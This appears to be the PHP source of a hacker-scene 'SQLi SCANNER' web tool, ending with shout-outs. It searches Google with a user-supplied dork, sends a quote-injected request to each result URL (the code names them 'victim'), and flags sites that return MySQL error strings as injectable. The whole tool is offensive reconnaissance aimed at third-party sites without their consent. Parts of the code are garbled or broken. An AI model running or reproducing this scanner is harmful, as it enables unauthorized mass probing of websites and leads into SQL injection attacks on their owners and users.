:: SQLi SCANNER ::

"; //google function letItBy() { ob_flush(); flush(); } $browser = $_SERVER['HTTP_USER_AGENT']; function google_that($query, $page = 1) { $resultPerPage = 8; $start = $page * $resultPerPage; $url = "http://ajax.googleapis.com/ajax/services/search/web?v=1.0&hl=iw&rsz={$resultPerPage}&start={$start}&q=" . urlencode($query); $resultFromGoogle = json_decode(http_get($url, true), true); if (isset($resultFromGoogle['responseStatus'])) { if ($resultFromGoogle['responseStatus'] != '200') return false; if (sizeof($resultFromGoogle['responseData']['results']) == 0) return false; else return $resultFromGoogle['responseData']['results']; } else die('The function ' . __FUNCTION__ . ' Kill me :(
' . $url); } function http_get($url, $safemode = false) { if ($safemode === true) sleep(1); $im = curl_init($url); curl_setopt($im, CURLOPT_RETURNTRANSFER, 1); curl_setopt($im, CURLOPT_CONNECTTIMEOUT, 10); curl_setopt($im, CURLOPT_FOLLOWLOCATION, 1); curl_setopt($im, CURLOPT_HEADER, 0); return curl_exec($im); curl_close(); } function cekvenurabel($result) { $url = preg_replace("/=/", "='", $result); $curl = curl_init(); curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1); curl_setopt($curl, CURLOPT_URL, $url); curl_setopt($curl, CURLOPT_USERAGENT, '$browser)'); curl_setopt($curl, CURLOPT_TIMEOUT, '5'); $GET = curl_exec($curl); if (preg_match("/error in your SQL syntax|mysql_fetch_array()|execute query|mysql_fetch_object()|mysql_num_rows()|mysql_fetch_assoc()|mysql_fetch​_row ()|SELECT * FROM|supplied argument is not a valid MySQL|Syntax error|Fatal error/i", $GET)) { echo '
Found : ' . $url . ' <-- SQLI Vuln Found..
'; ob_flush(); flush(); } else { echo '
' . $url . '<-- Not Vuln
'; ob_flush(); flush(); } ob_flush(); flush(); } if (isset($_POST['dork'] { 0 })) { for ($googlePage = 1;$googlePage <= 50;$googlePage++) { $googleResult = google_that($_POST['dork'], $googlePage); if (!$googleResult) { echo '
Finished scanning.
'; break; } for ($victim = 0;$victim < sizeof($googleResult);$victim++) { $result = $googleResult[$victim]['unescapedUrl']; cekvenurabel($result); letItBy(); } } } ?>
Google Dork:      
## Shout to ~>> | chud | pe4nk | edh0x | j121n | b412 | ## "; ?>